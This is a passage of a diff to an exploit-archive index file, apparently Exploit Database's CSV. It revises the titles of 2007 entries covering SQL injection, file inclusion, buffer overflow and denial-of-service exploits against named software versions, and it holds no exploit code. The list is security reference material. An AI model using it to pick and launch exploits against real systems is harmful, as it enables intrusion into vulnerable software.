-3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Include",2007-03-13,the_day,php,webapps,0 +3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - (root_path) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 -3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 +3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21 -3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0 -3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 +3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 - Local File Inclusion (Win32)",2007-03-14,Bl0od3r,php,webapps,0 +3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - (postpost.php) Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 -3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 +3479,platforms/linux/local/3479.php,"PHP 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Auth Bypass",2007-03-15,WiLdBoY,asp,webapps,0 3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21 -3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0 +3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection Exploit",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog (index.php) Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 -3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - (INCLUDE_PATH) RFI",2007-03-15,the_day,php,webapps,0 +3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - (INCLUDE_PATH) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 -3488,platforms/windows/local/3488.php,"PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",2007-03-15,rgod,windows,local,0 +3488,platforms/windows/local/3488.php,"PHP 4.4.6 ibase_connect() Local Buffer Overflow Exploit",2007-03-15,rgod,windows,local,0 3489,platforms/php/webapps/3489.txt,"creative guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (XSS/SQL) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0 @@ -3159,83 +3159,83 @@ id,file,description,date,author,platform,type,port 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryid) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b (download.php) Arbitrary File Download",2007-03-15,Piker,php,webapps,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit",2007-03-16,"Winny Thomas",windows,remote,6503 -3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 -3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 -3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 -3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 -3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 -3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 -3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Include",2007-03-17,GoLd_M,php,webapps,0 -3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes <= 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 +3496,platforms/php/webapps/3496.php,"Php-Stats 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 +3497,platforms/php/webapps/3497.php,"Php-Stats 0.1.9.1b (ip) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 +3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 +3499,platforms/linux/local/3499.php,"PHP 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 +3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - (post.php postid) SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 +3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 +3502,platforms/php/webapps/3502.php,"Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 +3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 +3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution",2007-03-18,DarkFig,php,webapps,0 -3506,platforms/php/webapps/3506.htm,"Guestbara <= 1.2 Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 -3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder <= 2.0 - (index.php) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 -3508,platforms/php/webapps/3508.txt,"Moodle <= 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 -3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes <= 2.0 - (index.php catid) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 -3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes <= 2.0 - (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 -3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating <= 2.0 - Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 +3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - (index.php) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3508,platforms/php/webapps/3508.txt,"Moodle 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 +3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 -3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) <= 1.0 - Remote SQL Injection Exploit",2007-03-18,Kacper,php,webapps,0 -3514,platforms/windows/dos/3514.pl,"Avant Browser <= 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 -3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics <= 2.0 - (index.php recid) SQL Injection Exploit",2007-03-19,ajann,php,webapps,0 -3516,platforms/php/webapps/3516.php,"MetaForum <= 0.513 Beta Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 +3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) <= 1.0 - SQL Injection Exploit",2007-03-18,Kacper,php,webapps,0 +3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 +3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - (index.php recid) SQL Injection Exploit",2007-03-19,ajann,php,webapps,0 +3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 - header() Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 -3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 -3520,platforms/asp/webapps/3520.txt,"NetVios Portal (page.asp) Remote SQL Injection",2007-03-19,parad0x,asp,webapps,0 +3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 +3520,platforms/asp/webapps/3520.txt,"NetVios Portal (page.asp) SQL Injection",2007-03-19,parad0x,asp,webapps,0 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 -3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0 -3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 +3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 +3525,platforms/linux/local/3525.php,"PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 -3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 -3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 - (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 +3529,platforms/linux/local/3529.php,"PHP 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 +3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - (functions.php root_path) Remote File Inclusion Exploit",2007-03-20,fluffy_bunny,php,webapps,0 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,554 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) <= 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b (module.php) Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 -3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) Remote SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 +3534,platforms/asp/webapps/3534.txt,"Active Link Engine (default.asp catid) SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit",2007-03-21,MADYNES,hardware,dos,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 - IMAP (SUBSCRIBE) Remote Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,143 -3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 +3538,platforms/php/webapps/3538.txt,"php-revista 1.1.2 - Multiple SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 -3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 +3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 -3545,platforms/php/webapps/3545.txt,"Lms <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 +3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 - (calendar.asp eventid) SQL Injection",2007-03-22,parad0x,asp,webapps,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 -3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - (default.asp catid) Remote SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3552,platforms/php/webapps/3552.txt,"Philex <= 0.2.3 - RFI / File Disclosure Remote Vulnerabilities",2007-03-23,GoLd_M,php,webapps,0 -3554,platforms/linux/remote/3554.pm,"dproxy <= 0.5 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 +3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - RFI / File Disclosure Remote Vulnerabilities",2007-03-23,GoLd_M,php,webapps,0 +3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0 -3556,platforms/asp/webapps/3556.htm,"Active Newsletter <= 4.3 - (ViewNewspapers.asp) SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 -3557,platforms/php/webapps/3557.txt,"Joomla/Mambo Component SWmenuFree 4.0 - RFI",2007-03-23,"Cold Zero",php,webapps,0 -3558,platforms/asp/webapps/3558.htm,"eWebquiz <= 8 - (eWebQuiz.asp) Remote SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 +3556,platforms/asp/webapps/3556.htm,"Active Newsletter 4.3 - (ViewNewspapers.asp) SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 +3557,platforms/php/webapps/3557.txt,"Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 +3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - (eWebQuiz.asp) SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 -3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 - (sbp) RFI",2007-03-23,"Cold Zero",php,webapps,0 +3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - (LOGIN) Remote IMAP Stack Buffer Overflow Exploit",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 -3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 -3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 -3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 -3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 -3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 -3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 -3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 +3563,platforms/php/webapps/3563.txt,"ttCMS 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 +3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager 1.1 - SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 +3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards 2.4.3 - SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 +3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 +3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion Exploit",2007-03-25,"Cold Zero",php,webapps,0 +3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 +3569,platforms/php/webapps/3569.pl,"PBlang 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 -3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 +3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0 @@ -3243,111 +3243,111 @@ id,file,description,date,author,platform,type,port 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 -3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 +3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 -3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 -3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 +3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 +3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80 -3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0 -3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) RFI",2007-03-27,"ThE TiGeR",php,webapps,0 +3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0 +3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0 -3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 - (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 -3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 -3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File Include",2007-03-28,GoLd_M,php,webapps,0 -3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 - (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 +3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 +3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 +3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 +3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 beta 2 - (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 -3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 +3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0 -3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 +3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 -3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 +3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - (wall.php cat) SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 -3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 -3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 +3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - 